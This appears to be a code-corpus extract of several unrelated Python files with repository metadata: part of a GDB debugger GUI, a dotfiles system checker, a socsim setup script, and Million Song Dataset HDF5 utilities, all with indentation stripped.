path=self.getCurrentFile()
if len(path)>0:
return self.editors.get(path)
def updatePosition(self):
""" Query current position and update the code view """
changed=False
poslist=self.debugger.getCurrentPos()
if poslist and len(poslist)>0:
for (path,line) in poslist:
if self.getCurrentFile()==path:
if self.currentLine!=line:
changed=True
break
if self.openSourceFile(path):
changed=True
break
e=self.editors.get(path)
if changed and e:
e.colorLine(line,'#0080ff')
e.cursorPosition=(line-1,1)
self.currentLine=line
e.ensureCursorVisible()
def saveWatches(self):
""" Save all watches to settings, for future sessions """
res=[]
n=self.watchesTree.topLevelItemCount()-1
for i in xrange(0,n):
item=self.watchesTree.topLevelItem(i)
if len(res)>0:
res.append(';')
res.append(item.text(0))
settings=QtCore.QSettings()
key='watches:{}'.format(self.debugger.debugged)
settings.setValue(key,''.join(res))
def loadWatches(self):
""" Load all previous session watches from settings """
while self.watchesTree.topLevelItemCount()>1:
self.watchesTree.takeTopLevelItem(0)
settings=QtCore.QSettings()
key='watches:{}'.format(self.debugger.debugged)
val=settings.value(key,'').toString()
if len(val)>0:
arr=val.split(';')
if len(arr)>0:
res=[]
for watch in arr:
res.append(QtGui.QTreeWidgetItem([watch]))
self.watchesTree.insertTopLevelItems(0,res)
def updateLocals(self):
locals=self.debugger.getLocals()
self.localsTree.clear()
for var in locals.keys():
item=QtGui.QTreeWidgetItem([var])
self.localsTree.addTopLevelItem(item)
res=locals.get(var)
if res:
self.updateWatchItem(item,res)
def updateWatches(self):
""" Re-evaluate the value of each watch and update view """
n=self.watchesTree.topLevelItemCount()-1
for i in xrange(0,n):
item=self.watchesTree.topLevelItem(i)
item.takeChildren()
expr=item.text(0)
res=self.debugger.evaluate(expr)
if res:
self.updateWatchItem(item,res)
def updateWatchItem(self,item,root):
item.setText(1,root.value)
def addChildren(item,node):
for c in node.children:
subitem=QtGui.QTreeWidgetItem([c.name])
subitem.setText(1,c.value)
item.addChild(subitem)
addChildren(subitem,c)
addChildren(item,root)
def updateCallstack(self):
bt=self.debugger.getBackTrace()
self.stackList.clear()
for line in bt:
self.stackList.addItem(line)
def startDebug(self):
if self.debugger:
self.actCont()
return
self.outputEdit.setPlainText('')
cmd=[self.workspaceTree.getExecutablePath()]
args=self.workspaceTree.getDebugParams().split()
cwd=self.workspaceTree.getDebugDirectory()
if len(cwd)<1:
cwd=self.workspaceTree.mainPath()
for a in args:
cmd.append(a)
self.debugger=GDBWrapper(self.breakpoints,cmd,cwd)
#self.showWatchesPane()
#self.showCallStackPane()
#self.loadDebugWindowState()
self.showDebugPanes()
self.loadWatches()
self.timer.start(50)
qutepart.evaluator=self.debugger.evaluateAsText
def stopDebugger(self):
if self.debugger:
qutepart.evaluator=None
for path in self.editors:
e=self.editors.get(path)
e.colorLine(0,'')
self.saveDebugWindowState()
self.debugger.quitDebugger()
self.debugger=None
#self.paneWatches.close()
#self.paneWatches=None
#self.paneStack.close()
#self.paneStack=None
self.hideDebugPanes()
self.timer.stop()
def hideDebugPanes(self):
self.paneWatches.hide()
self.paneLocals.hide()
self.paneStack.hide()
def showDebugPanes(self):
self.paneWatches.show()
self.paneLocals.show()
self.paneStack.show()
def clearBreakpoints(self):
self.breakpoints.clear()
n=self.central.count()
for i in xrange(0,n):
self.central.widget(i).bpMarks={}
if self.debugger:
self.debugger.clearBreakpoints()
def actStep(self):
if self.debugger:
self.debugger.actStep()
if not self.debugger.running:
self.stopDebugger()
def actNext(self):
if self.debugger:
self.debugger.actNext()
if not self.debugger.running:
self.stopDebugger()
def actOut(self):
if self.debugger:
self.debugger.actOut()
if not self.debugger.running:
self.stopDebugger()
def actCont(self):
if self.debugger:
e=self.getCurrentEditor()
if e:
e.colorLine(0,'')
self.currentLine=-1
self.debugger.actCont()
def actBreak(self):
if self.debugger:
self.debugger.actBreak()
def actStop(self):
if self.debugger:
self.debugger.actStop()
def update(self):
""" Called every 50ms to check if a change in debugger state occurred
Basically this is waiting for a change of state, indicated by:
* self.debugger.changed
If a change is detected, everything is re-evaluated and drawn
"""
if self.debugger:
self.debugger.update()
#if len(text)>0:
# self.addOutputText(text)
if self.debugger.hasOutput():
self.addOutputText(self.debugger.getOutput())
if self.debugger.changed:
self.updatePosition()
self.updateWatches()
self.updateLocals()
self.updateCallstack()
self.debugger.changed=False
if not self.debugger.running:
self.stopDebugger()
# If the debugger is active running the program,
# create an indication using an animation in the top left
# corner of the application window
if self.debugger and self.debugger.active:
if self.runningWidget is None:
from running import RunningWidget
self.runningWidget=RunningWidget(self)
self.runningWidget.show()
self.outputEdit.setBlinkingCursor(True)
s=self.outputEdit.getInput()
if len(s)>0:
text=''.join(s)
self.debugger.sendInput(text)
self.addOutputText(text)
else:
self.outputEdit.clearInput()
self.outputEdit.setBlinkingCursor(False)
if not self.runningWidget is None:
self.runningWidget.close()
self.runningWidget=None
|
gpl-2.0
| -3,514,037,278,721,606,700
| 36.664583
| 135
| 0.576286
| false
| 4.162791
| true
| false
| false
|
pradyunsg/dotfiles
|
lib/checker.py
|
1
|
5820
|
import os
import sys
import shutil
import platform
from .logging import Logger, log
from .utils import run_output
import click
import yaml
class SystemChecker(object):
"""A super-fancy helper for checking the system configuration
"""
def __init__(self, verbose):
super().__init__()
self._logger = Logger()
self.verbose = verbose
def _log_happy(self, msg):
self._logger.spaced_status("pass", msg, fit_width=4)
def _log_angry(self, msg, is_warning):
if is_warning:
self._logger.spaced_status("warn", msg, fit_width=4)
else:
self._logger.spaced_status("fail", msg, fit_width=4)
def platform(self):
return platform.system()
def equal(self, expected, *, should_warn=False, **kwargs):
"""Check if a given value for something is equal to the expected value.
checker.equal(value, name=from_system)
"""
assert len(kwargs) == 1, "expected 1 keyword argument"
name, value = next(iter(kwargs.items()))
if value == expected:
self._log_happy(name + " is correct")
else:
self._log_angry(
f"{name} is not {expected!r}, it is {value!r}",
is_warning=should_warn,
)
# The actual logic is below
def run(self, fname):
data = self._load_yaml(fname)
self._check_username(data["identity"]["username"])
self._check_ssh(data["identity"]["ssh-key"])
self._check_gpg(data["identity"]["gpg-key"])
for category, contents in data["things"].items():
self._check_category(category, contents, data)
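# A minimal sketch of the YAML layout that run() expects, inferred from the
# keys accessed here and in _check_category/_check_run_items; the concrete
# values below are made up:
#
#   identity:
#     username: alice
#     ssh-key: "aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77:88:99"
#     gpg-key: 0123456789ABCDEF
#   things:
#     shell-tools:
#       if:
#         platform: Linux
#       executables: git, tmux, curl
#       run_check:
#         git-username:
#           cmd: git config --global user.name
#           equal: $identity.username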
def _load_yaml(self, fname):
with open(fname) as f:
try:
return yaml.safe_load(f)
except Exception as e:
click.secho("ERROR: Could not parse file.", fg="red")
click.secho(str(e), fg="red")
sys.exit(1)
def _check_username(self, expected):
self.equal(expected, Username=os.environ["USER"])
def _check_ssh(self, expected):
# FIXME: Is this fragile?
output = run_output("ssh-keygen -E md5 -lf {}".format(
os.path.expanduser("~/.ssh/id_rsa.pub")
))
if output is None:
ssh_key = "not found"
else:
ssh_key = output.split()[1]
if ssh_key.startswith("MD5:"):
ssh_key = ssh_key[4:]
self.equal(expected, **{"SSH key": ssh_key})
def _check_gpg(self, expected):
# This checks that the GPG key exists in the dB
output = run_output("gpg --list-keys {}".format(expected))
if output is not None:
self.equal(expected, **{"GPG key": expected})
else:
self.equal(expected, **{"GPG key": "not found"})
def _check_category(self, category, contents, data):
if "if" in contents:
if list(contents["if"]) != ["platform"]:
raise ValueError(
"Needed condition of category {} to be 'platform'"
.format(category)
)
if contents["if"]["platform"] != self.platform():
log.spaced_status("skip", category)
return
log.spaced_status("topic", category, fit_width=5)
with log:
self._check_executables(
category, contents.get("executables", None)
)
self._check_run_items(
category, contents.get("run_check", None), data
)
def _check_executables(self, category, executables):
if not executables:
return
# Convert the string to a list.
executables = list(map(lambda x: x.strip(), executables.split(",")))
missing = set()
for fname in executables:
if shutil.which(fname) is None:
missing.add(fname)
verb = lambda x: "executable" if len(x) == 1 else "executables"
if missing:
desc = "missing {}: {}".format(
verb(missing), ", ".join(map(repr, missing))
)
log.spaced_status("fail", desc, fit_width=4)
else:
log.spaced_status(
"pass",
"{} {} available".format(len(executables), verb(executables)),
fit_width=4,
)
def _check_run_items(self, category, run_items, data):
if not run_items:
return
for name, cmd_dict in run_items.items():
if not isinstance(cmd_dict, dict) or "cmd" not in cmd_dict:
log.spaced_status(
"warn", f"!!! invalid !!! {category} {name}",
fit_width=4
)
continue
got = run_output(cmd_dict["cmd"])
# default to a pass so an item without an 'equal' key cannot leave 'ok' unset
ok = True
reason = ""
if got is None:
# Did not exit cleanly
ok = False
reason = "command did not succeed"
elif "equal" in cmd_dict:
# Match the output against an expected value...
expected = cmd_dict["equal"]
# Perform substitution (from values earlier in the dict)
if expected.startswith("$"):
expected = _dotted_access(data, expected[1:])
ok = expected == got.rstrip()
reason = f"{expected!r} != {got!r}"
if ok:
log.spaced_status("pass", name, fit_width=4)
else:
log.spaced_status("fail", name, fit_width=4)
if self.verbose:
with log:
log.info(reason)
def _dotted_access(data, spec):
item = data
for part in spec.split("."):
item = item[part]
return item
|
mit
| -4,368,949,340,365,042,700
| 30.978022
| 79
| 0.518041
| false
| 4.157143
| false
| false
| false
|
peterrenshaw/socsim
|
setup.py
|
1
|
1400
|
#!/usr/bin/env python
# ~*~ encoding: utf-8 ~*~
"""
This file is part of SOCSIM.
SOCSIM is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SOCSIM is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with SOCSIM. If not, see <http://www.gnu.org/licenses/>.
"""
import os
from setuptools import setup
from setuptools import find_packages
from socsim import __version__
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name = "socsim",
version = __version__,
description = 'social media simulation tools',
long_description=read('README'),
license = 'GNU GPL 3.0',
author = "Peter Renshaw",
author_email = "goonmail@netspace.net.au",
url = 'https://github.com/peterrenshaw/socsim',
packages = find_packages(),
keywords = ['message','testing','human','response'],
zip_safe = True)
# vim: ff=unix:ts=4:sw=4:tw=78:noai:expandtab
|
gpl-3.0
| -4,294,559,742,352,133,000
| 30.111111
| 72
| 0.682143
| false
| 3.763441
| false
| false
| false
|
judaba13/GenrePredictor
|
hdf5_utils.py
|
1
|
28730
|
"""
Thierry Bertin-Mahieux (2010) Columbia University
tb2332@columbia.edu
This code contains a set of routines to create HDF5 files containing
features and metadata of a song.
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2010, Thierry Bertin-Mahieux
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import numpy as np
# code relies on pytables, see http://www.pytables.org
import tables
import hdf5_descriptors as DESC
from hdf5_getters import *
# musicbrainz related stuff
try:
from MBrainzDB import query as QUERYMB
except ImportError:
print 'need pg module and MBrainzDB folder of Python source code if you'
print 'want to use musicbrainz related functions, e.g. fill_hdf5_from_musicbrainz'
# description of the different arrays in the song file
ARRAY_DESC_SIMILAR_ARTISTS = 'array of similar artists Echo Nest id'
ARRAY_DESC_ARTIST_TERMS = 'array of terms (Echo Nest tags) for an artist'
ARRAY_DESC_ARTIST_TERMS_FREQ = 'array of term (Echo Nest tags) frequencies for an artist'
ARRAY_DESC_ARTIST_TERMS_WEIGHT = 'array of term (Echo Nest tags) weights for an artist'
ARRAY_DESC_SEGMENTS_START = 'array of start times of segments'
ARRAY_DESC_SEGMENTS_CONFIDENCE = 'array of confidence of segments'
ARRAY_DESC_SEGMENTS_PITCHES = 'array of pitches of segments (chromas)'
ARRAY_DESC_SEGMENTS_TIMBRE = 'array of timbre of segments (MFCC-like)'
ARRAY_DESC_SEGMENTS_LOUDNESS_MAX = 'array of max loudness of segments'
ARRAY_DESC_SEGMENTS_LOUDNESS_MAX_TIME = 'array of max loudness time of segments'
ARRAY_DESC_SEGMENTS_LOUDNESS_START = 'array of loudness of segments at start time'
ARRAY_DESC_SECTIONS_START = 'array of start times of sections'
ARRAY_DESC_SECTIONS_CONFIDENCE = 'array of confidence of sections'
ARRAY_DESC_BEATS_START = 'array of start times of beats'
ARRAY_DESC_BEATS_CONFIDENCE = 'array of confidence of sections'
ARRAY_DESC_BARS_START = 'array of start times of bars'
ARRAY_DESC_BARS_CONFIDENCE = 'array of confidence of bars'
ARRAY_DESC_TATUMS_START = 'array of start times of tatums'
ARRAY_DESC_TATUMS_CONFIDENCE = 'array of confidence of tatums'
ARRAY_DESC_ARTIST_MBTAGS = 'array of tags from MusicBrainz for an artist'
ARRAY_DESC_ARTIST_MBTAGS_COUNT = 'array of tag counts from MusicBrainz for an artist'
def fill_hdf5_from_artist(h5,artist):
"""
Fill an open hdf5 using all content in an artist object
from the Echo Nest python API
There could be overlap with fill_from_song and fill_from_track,
we assume the data is consistent!
"""
# get the metadata table, fill it
metadata = h5.root.metadata.songs
metadata.cols.artist_id[0] = artist.id
idsplitter = lambda x,y: x.split(':')[2] if x else y
metadata.cols.artist_mbid[0] = idsplitter(artist.get_foreign_id(idspace='musicbrainz'),'')
metadata.cols.artist_playmeid[0] = int(idsplitter(artist.get_foreign_id(idspace='playme'),-1))
metadata.cols.artist_7digitalid[0] = int(idsplitter(artist.get_foreign_id(idspace='7digital'),-1))
# fill the metadata arrays
group = h5.root.metadata
metadata.cols.idx_similar_artists[0] = 0
group.similar_artists.append( np.array(map(lambda x : x.id,artist.get_similar(results=100)),dtype='string') )
metadata.cols.idx_artist_terms[0] = 0
group.artist_terms.append( np.array(map(lambda x : x.name,artist.get_terms()),dtype='string') )
group.artist_terms_freq.append( np.array(map(lambda x : x.frequency,artist.get_terms()),dtype='float64') )
group.artist_terms_weight.append( np.array(map(lambda x : x.weight,artist.get_terms()),dtype='float64') )
# done, flush
metadata.flush()
def fill_hdf5_from_song(h5,song):
"""
Fill an open hdf5 using all the content in a song object
from the Echo Nest python API.
Usually, fill_hdf5_from_track() will have been called first.
"""
# get the metadata table, fill it
metadata = h5.root.metadata.songs
metadata.cols.artist_familiarity[0] = song.get_artist_familiarity()
metadata.cols.artist_hotttnesss[0] = song.get_artist_hotttnesss()
metadata.cols.artist_id[0] = song.artist_id
metadata.cols.artist_latitude[0] = song.get_artist_location().latitude
metadata.cols.artist_location[0] = song.get_artist_location().location.encode('utf-8') if song.get_artist_location().location else ''
metadata.cols.artist_longitude[0] = song.get_artist_location().longitude
metadata.cols.artist_name[0] = song.artist_name.encode('utf-8') if song.artist_name else ''
metadata.cols.song_id[0] = song.id
metadata.cols.song_hotttnesss[0] = song.get_song_hotttnesss()
metadata.cols.title[0] = song.title.encode('utf-8') if song.title else ''
metadata.flush()
# get the analysis table
analysis = h5.root.analysis.songs
analysis.cols.danceability[0] = song.get_audio_summary().danceability
analysis.cols.energy[0] = song.get_audio_summary().energy
analysis.flush()
def fill_hdf5_from_track(h5,track):
"""
Fill an open hdf5 using all the content in a track object
from the Echo Nest python API
"""
# get the metadata table, fill it
metadata = h5.root.metadata.songs
#metadata.cols.analyzer_version[0] = track.analyzer_version
metadata.cols.artist_name[0] = getattr(track, 'artist', u'').encode('utf-8')
metadata.cols.release[0] = getattr(track, 'release', u'').encode('utf-8')
metadata.cols.title[0] = getattr(track, 'title', u'').encode('utf-8')
idsplitter_7digital = lambda x: int(x.split(':')[2]) if x and x.split(':')[0]=='7digital' else -1
metadata.cols.release_7digitalid[0] = idsplitter_7digital(track.foreign_release_id)
metadata.cols.track_7digitalid[0] = idsplitter_7digital(track.foreign_id)
metadata.flush()
# get the analysis table, fill it
analysis = h5.root.analysis.songs
analysis.cols.analysis_sample_rate[0] = track.analysis_sample_rate
analysis.cols.audio_md5[0] = track.audio_md5
analysis.cols.duration[0] = track.duration
analysis.cols.end_of_fade_in[0] = track.end_of_fade_in
analysis.cols.key[0] = track.key
analysis.cols.key_confidence[0] = track.key_confidence
analysis.cols.loudness[0] = track.loudness
analysis.cols.mode[0] = track.mode
analysis.cols.mode_confidence[0] = track.mode_confidence
analysis.cols.start_of_fade_out[0] = track.start_of_fade_out
analysis.cols.tempo[0] = track.tempo
analysis.cols.time_signature[0] = track.time_signature
analysis.cols.time_signature_confidence[0] = track.time_signature_confidence
analysis.cols.track_id[0] = track.id
analysis.flush()
group = h5.root.analysis
# analysis arrays (segments)
analysis.cols.idx_segments_start[0] = 0
group.segments_start.append( np.array(map(lambda x : x['start'],track.segments),dtype='float64') )
analysis.cols.idx_segments_confidence[0] = 0
group.segments_confidence.append( np.array(map(lambda x : x['confidence'],track.segments),dtype='float64') )
analysis.cols.idx_segments_pitches[0] = 0
group.segments_pitches.append( np.array(map(lambda x : x['pitches'],track.segments),dtype='float64') )
analysis.cols.idx_segments_timbre[0] = 0
group.segments_timbre.append( np.array(map(lambda x : x['timbre'],track.segments),dtype='float64') )
analysis.cols.idx_segments_loudness_max[0] = 0
group.segments_loudness_max.append( np.array(map(lambda x : x['loudness_max'],track.segments),dtype='float64') )
analysis.cols.idx_segments_loudness_max_time[0] = 0
group.segments_loudness_max_time.append( np.array(map(lambda x : x['loudness_max_time'],track.segments),dtype='float64') )
analysis.cols.idx_segments_loudness_start[0] = 0
group.segments_loudness_start.append( np.array(map(lambda x : x['loudness_start'],track.segments),dtype='float64') )
# analysis arrays (sections)
analysis.cols.idx_sections_start[0] = 0
group.sections_start.append( np.array(map(lambda x : x['start'],track.sections),dtype='float64') )
analysis.cols.idx_sections_confidence[0] = 0
group.sections_confidence.append( np.array(map(lambda x : x['confidence'],track.sections),dtype='float64') )
# analysis arrays (beats)
analysis.cols.idx_beats_start[0] = 0
group.beats_start.append( np.array(map(lambda x : x['start'],track.beats),dtype='float64') )
analysis.cols.idx_beats_confidence[0] = 0
group.beats_confidence.append( np.array(map(lambda x : x['confidence'],track.beats),dtype='float64') )
# analysis arrays (bars)
analysis.cols.idx_bars_start[0] = 0
group.bars_start.append( np.array(map(lambda x : x['start'],track.bars),dtype='float64') )
analysis.cols.idx_bars_confidence[0] = 0
group.bars_confidence.append( np.array(map(lambda x : x['confidence'],track.bars),dtype='float64') )
# analysis arrays (tatums)
analysis.cols.idx_tatums_start[0] = 0
group.tatums_start.append( np.array(map(lambda x : x['start'],track.tatums),dtype='float64') )
analysis.cols.idx_tatums_confidence[0] = 0
group.tatums_confidence.append( np.array(map(lambda x : x['confidence'],track.tatums),dtype='float64') )
analysis.flush()
# DONE
def fill_hdf5_from_musicbrainz(h5,connect):
"""
Fill an open hdf5 using the musicbrainz server and data.
We assume this code is run after fill_hdf5_from_artist/song
because we need artist_mbid, artist_name, release and title
INPUT
h5 - open song file (append mode)
connect - open pg connection to musicbrainz_db
"""
# get info from h5 song file
ambid = h5.root.metadata.songs.cols.artist_mbid[0]
artist_name = h5.root.metadata.songs.cols.artist_name[0]
release = h5.root.metadata.songs.cols.release[0]
title = h5.root.metadata.songs.cols.title[0]
# get the musicbrainz table, fill it
musicbrainz = h5.root.musicbrainz.songs
musicbrainz.cols.year[0] = QUERYMB.find_year_safemode(connect,ambid,title,release,artist_name)
# fill the musicbrainz arrays
group = h5.root.musicbrainz
musicbrainz.cols.idx_artist_mbtags[0] = 0
tags,tagcount = QUERYMB.get_artist_tags(connect, ambid, maxtags=20)
group.artist_mbtags.append( np.array(tags,dtype='string') )
group.artist_mbtags_count.append( np.array(tagcount,dtype='float64') )
# done, flush
musicbrainz.flush()
def fill_hdf5_aggregate_file(h5,h5_filenames,summaryfile=False):
"""
Fill an open hdf5 aggregate file using all the content from all the HDF5 files
listed as filenames. These HDF5 files are supposed to be filled already.
Useful to create one big HDF5 file from many, thus improving IO speed.
For most of the info, we simply use one row per song.
For the arrays (e.g. segments_start) we need the indices (e.g. idx_segments_start)
to know which part of the array belongs to one particular song.
If summaryfile=True, we skip arrays (indices all 0)
"""
# counter
counter = 0
# iterate over filenames
for h5idx,h5filename in enumerate(h5_filenames):
# open h5 file
h5tocopy = open_h5_file_read(h5filename)
# get number of songs in new file
nSongs = get_num_songs(h5tocopy)
# iterate over songs in one HDF5 (1 if regular file, more if aggregate file)
for songidx in xrange(nSongs):
# METADATA
row = h5.root.metadata.songs.row
row["artist_familiarity"] = get_artist_familiarity(h5tocopy,songidx)
row["artist_hotttnesss"] = get_artist_hotttnesss(h5tocopy,songidx)
row["artist_id"] = get_artist_id(h5tocopy,songidx)
row["artist_mbid"] = get_artist_mbid(h5tocopy,songidx)
row["artist_playmeid"] = get_artist_playmeid(h5tocopy,songidx)
row["artist_7digitalid"] = get_artist_7digitalid(h5tocopy,songidx)
row["artist_latitude"] = get_artist_latitude(h5tocopy,songidx)
row["artist_location"] = get_artist_location(h5tocopy,songidx)
row["artist_longitude"] = get_artist_longitude(h5tocopy,songidx)
row["artist_name"] = get_artist_name(h5tocopy,songidx)
row["release"] = get_release(h5tocopy,songidx)
row["release_7digitalid"] = get_release_7digitalid(h5tocopy,songidx)
row["song_id"] = get_song_id(h5tocopy,songidx)
row["song_hotttnesss"] = get_song_hotttnesss(h5tocopy,songidx)
row["title"] = get_title(h5tocopy,songidx)
row["track_7digitalid"] = get_track_7digitalid(h5tocopy,songidx)
# INDICES
if not summaryfile:
if counter == 0 : # we're first row
row["idx_similar_artists"] = 0
row["idx_artist_terms"] = 0
else:
row["idx_similar_artists"] = h5.root.metadata.similar_artists.shape[0]
row["idx_artist_terms"] = h5.root.metadata.artist_terms.shape[0]
row.append()
h5.root.metadata.songs.flush()
# ARRAYS
if not summaryfile:
h5.root.metadata.similar_artists.append( get_similar_artists(h5tocopy,songidx) )
h5.root.metadata.artist_terms.append( get_artist_terms(h5tocopy,songidx) )
h5.root.metadata.artist_terms_freq.append( get_artist_terms_freq(h5tocopy,songidx) )
h5.root.metadata.artist_terms_weight.append( get_artist_terms_weight(h5tocopy,songidx) )
# ANALYSIS
row = h5.root.analysis.songs.row
row["analysis_sample_rate"] = get_analysis_sample_rate(h5tocopy,songidx)
row["audio_md5"] = get_audio_md5(h5tocopy,songidx)
row["danceability"] = get_danceability(h5tocopy,songidx)
row["duration"] = get_duration(h5tocopy,songidx)
row["end_of_fade_in"] = get_end_of_fade_in(h5tocopy,songidx)
row["energy"] = get_energy(h5tocopy,songidx)
row["key"] = get_key(h5tocopy,songidx)
row["key_confidence"] = get_key_confidence(h5tocopy,songidx)
row["loudness"] = get_loudness(h5tocopy,songidx)
row["mode"] = get_mode(h5tocopy,songidx)
row["mode_confidence"] = get_mode_confidence(h5tocopy,songidx)
row["start_of_fade_out"] = get_start_of_fade_out(h5tocopy,songidx)
row["tempo"] = get_tempo(h5tocopy,songidx)
row["time_signature"] = get_time_signature(h5tocopy,songidx)
row["time_signature_confidence"] = get_time_signature_confidence(h5tocopy,songidx)
row["track_id"] = get_track_id(h5tocopy,songidx)
# INDICES
if not summaryfile:
if counter == 0 : # we're first row
row["idx_segments_start"] = 0
row["idx_segments_confidence"] = 0
row["idx_segments_pitches"] = 0
row["idx_segments_timbre"] = 0
row["idx_segments_loudness_max"] = 0
row["idx_segments_loudness_max_time"] = 0
row["idx_segments_loudness_start"] = 0
row["idx_sections_start"] = 0
row["idx_sections_confidence"] = 0
row["idx_beats_start"] = 0
row["idx_beats_confidence"] = 0
row["idx_bars_start"] = 0
row["idx_bars_confidence"] = 0
row["idx_tatums_start"] = 0
row["idx_tatums_confidence"] = 0
else : # check the current shape of the arrays
row["idx_segments_start"] = h5.root.analysis.segments_start.shape[0]
row["idx_segments_confidence"] = h5.root.analysis.segments_confidence.shape[0]
row["idx_segments_pitches"] = h5.root.analysis.segments_pitches.shape[0]
row["idx_segments_timbre"] = h5.root.analysis.segments_timbre.shape[0]
row["idx_segments_loudness_max"] = h5.root.analysis.segments_loudness_max.shape[0]
row["idx_segments_loudness_max_time"] = h5.root.analysis.segments_loudness_max_time.shape[0]
row["idx_segments_loudness_start"] = h5.root.analysis.segments_loudness_start.shape[0]
row["idx_sections_start"] = h5.root.analysis.sections_start.shape[0]
row["idx_sections_confidence"] = h5.root.analysis.sections_confidence.shape[0]
row["idx_beats_start"] = h5.root.analysis.beats_start.shape[0]
row["idx_beats_confidence"] = h5.root.analysis.beats_confidence.shape[0]
row["idx_bars_start"] = h5.root.analysis.bars_start.shape[0]
row["idx_bars_confidence"] = h5.root.analysis.bars_confidence.shape[0]
row["idx_tatums_start"] = h5.root.analysis.tatums_start.shape[0]
row["idx_tatums_confidence"] = h5.root.analysis.tatums_confidence.shape[0]
row.append()
h5.root.analysis.songs.flush()
# ARRAYS
if not summaryfile:
h5.root.analysis.segments_start.append( get_segments_start(h5tocopy,songidx) )
h5.root.analysis.segments_confidence.append( get_segments_confidence(h5tocopy,songidx) )
h5.root.analysis.segments_pitches.append( get_segments_pitches(h5tocopy,songidx) )
h5.root.analysis.segments_timbre.append( get_segments_timbre(h5tocopy,songidx) )
h5.root.analysis.segments_loudness_max.append( get_segments_loudness_max(h5tocopy,songidx) )
h5.root.analysis.segments_loudness_max_time.append( get_segments_loudness_max_time(h5tocopy,songidx) )
h5.root.analysis.segments_loudness_start.append( get_segments_loudness_start(h5tocopy,songidx) )
h5.root.analysis.sections_start.append( get_sections_start(h5tocopy,songidx) )
h5.root.analysis.sections_confidence.append( get_sections_confidence(h5tocopy,songidx) )
h5.root.analysis.beats_start.append( get_beats_start(h5tocopy,songidx) )
h5.root.analysis.beats_confidence.append( get_beats_confidence(h5tocopy,songidx) )
h5.root.analysis.bars_start.append( get_bars_start(h5tocopy,songidx) )
h5.root.analysis.bars_confidence.append( get_bars_confidence(h5tocopy,songidx) )
h5.root.analysis.tatums_start.append( get_tatums_start(h5tocopy,songidx) )
h5.root.analysis.tatums_confidence.append( get_tatums_confidence(h5tocopy,songidx) )
# MUSICBRAINZ
row = h5.root.musicbrainz.songs.row
row["year"] = get_year(h5tocopy,songidx)
# INDICES
if not summaryfile:
if counter == 0 : # we're first row
row["idx_artist_mbtags"] = 0
else:
row["idx_artist_mbtags"] = h5.root.musicbrainz.artist_mbtags.shape[0]
row.append()
h5.root.musicbrainz.songs.flush()
# ARRAYS
if not summaryfile:
h5.root.musicbrainz.artist_mbtags.append( get_artist_mbtags(h5tocopy,songidx) )
h5.root.musicbrainz.artist_mbtags_count.append( get_artist_mbtags_count(h5tocopy,songidx) )
# counter
counter += 1
# close h5 file
h5tocopy.close()
def create_song_file(h5filename,title='H5 Song File',force=False,complevel=1):
"""
Create a new HDF5 file for a new song.
If force=False, refuse to overwrite an existing file;
a ValueError is raised in that case.
The other optional params are the H5 file title and the compression level.
Sets up the groups, each containing a table 'songs' with one row:
- metadata
- analysis
- musicbrainz
DETAIL
- we set the compression level to 1 by default, it uses the ZLIB library
to disable compression, set it to 0
"""
# check if file exists
if not force:
if os.path.exists(h5filename):
raise ValueError('file exists, can not create HDF5 song file')
# create the H5 file
h5 = tables.openFile(h5filename, mode='w', title=title)
# set filter level
h5.filters = tables.Filters(complevel=complevel,complib='zlib')
# setup the groups and tables
# group metadata
group = h5.createGroup("/",'metadata','metadata about the song')
table = h5.createTable(group,'songs',DESC.SongMetaData,'table of metadata for one song')
r = table.row
r.append() # filled with default values 0 or '' (depending on type)
table.flush()
# group analysis
group = h5.createGroup("/",'analysis','Echo Nest analysis of the song')
table = h5.createTable(group,'songs',DESC.SongAnalysis,'table of Echo Nest analysis for one song')
r = table.row
r.append() # filled with default values 0 or '' (depending on type)
table.flush()
# group musicbrainz
group = h5.createGroup("/",'musicbrainz','data about the song coming from MusicBrainz')
table = h5.createTable(group,'songs',DESC.SongMusicBrainz,'table of data coming from MusicBrainz')
r = table.row
r.append() # filled with default values 0 or '' (depending on type)
table.flush()
# create arrays
create_all_arrays(h5,expectedrows=3)
# close it, done
h5.close()
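# A minimal usage sketch for a single song file (illustrative only; assumes
# pyechonest 'track' and 'song' objects are already available and the file
# name is hypothetical):
#   create_song_file('TRexample.h5', force=True)
#   h5 = open_h5_file_append('TRexample.h5')
#   fill_hdf5_from_track(h5, track)
#   fill_hdf5_from_song(h5, song)
#   h5.close()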
def create_aggregate_file(h5filename,title='H5 Aggregate File',force=False,expectedrows=1000,complevel=1,
summaryfile=False):
"""
Create a new HDF5 file for all songs.
It will contains everything that are in regular song files.
Tables created empty.
If force=False, refuse to overwrite an existing file;
a ValueError is raised in that case.
If summaryfile=True, creates a summary file, i.e. no arrays.
The other optional params are the H5 file title, the expected number of rows
and the compression level.
DETAILS
- if you create a very large file, try to approximate correctly
the number of data points (songs), it speeds things up with arrays (by
setting the chunking correctly).
- we set the compression level to 1 by default, it uses the ZLIB library
to disable compression, set it to 0
Sets up the groups, each containing a table 'songs' with one row:
- metadata
- analysis
- musicbrainz
"""
# check if file exists
if not force:
if os.path.exists(h5filename):
raise ValueError('file exists, can not create HDF5 song file')
# summary file? change title
if summaryfile:
title = 'H5 Summary File'
# create the H5 file
h5 = tables.openFile(h5filename, mode='w', title=title)
# set filter level
h5.filters = tables.Filters(complevel=complevel,complib='zlib')
# setup the groups and tables
# group metadata
group = h5.createGroup("/",'metadata','metadata about the song')
table = h5.createTable(group,'songs',DESC.SongMetaData,'table of metadata for one song',
expectedrows=expectedrows)
# group analysis
group = h5.createGroup("/",'analysis','Echo Nest analysis of the song')
table = h5.createTable(group,'songs',DESC.SongAnalysis,'table of Echo Nest analysis for one song',
